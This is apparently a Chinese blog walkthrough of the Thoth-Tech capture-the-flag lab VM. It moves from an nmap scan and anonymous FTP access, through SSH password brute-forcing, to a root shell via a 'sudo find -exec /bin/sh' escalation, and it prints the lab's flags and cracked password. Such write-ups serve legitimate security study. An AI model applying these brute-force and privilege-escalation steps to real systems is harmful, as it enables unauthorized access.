Thoth-Tech wp
Thoth-Tech wp
信息收集
nmap 扫描得到
Nmap scan report for 192.168.148.188
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:BB:A9:C9 (VMware)
开启21端口,尝试anonymous登录
ftp> open 192.168.148.188
Connected to 192.168.148.188.
220 (vsFTPd 3.0.3)
Name (192.168.148.188:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
226 Directory send OK.
发现ftp服务器上存在note.txt文件,尝试下载下来
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.02 secs (4.7113 kB/s)
查看内容
root@kali:~# cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
漏洞利用
提示弱密码,暴力破解ssh
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.148.188:22/
[STATUS] 113.00 tries/min, 113 tries in 00:01h, 14344287 to do in 2115:41h, 16 active
[22][ssh] host: 192.168.148.188 login: pwnlab password: babygirl1
pwnlab@192.168.148.188 登录ssh
找到user.txt文件
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
提升权限
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
find命令sudo提权,不需要密码,直接提权
sudo find user.txt -exec /bin/sh \; -quit
得到root权限
得到flag
寻找flag文件
# uid=0(root) gid=0(root) groups=0(root)
# ls
user.txt
# cd /root
# ls
root.txt snap
# ls -al
total 44
drwx------ 6 root root 4096 Nov 24 2021 .
drwxr-xr-x 20 root root 4096 Jun 28 18:32 ..
-rw------- 1 root root 14 Jul 2 09:38 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Nov 24 2021 .cache
drwxr-xr-x 3 root root 4096 Jun 28 19:09 .local
-rw------- 1 root root 146 Jun 28 19:05 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 57 Jul 2 08:51 root.txt
drwxr-xr-x 3 root root 4096 Jun 28 18:54 snap
drwx------ 2 root root 4096 Jun 28 18:53 .ssh
# cd snap
# ls
lxd
# cd ..
# ls
root.txt snap
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job :)
#
作者:寒江寻影
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。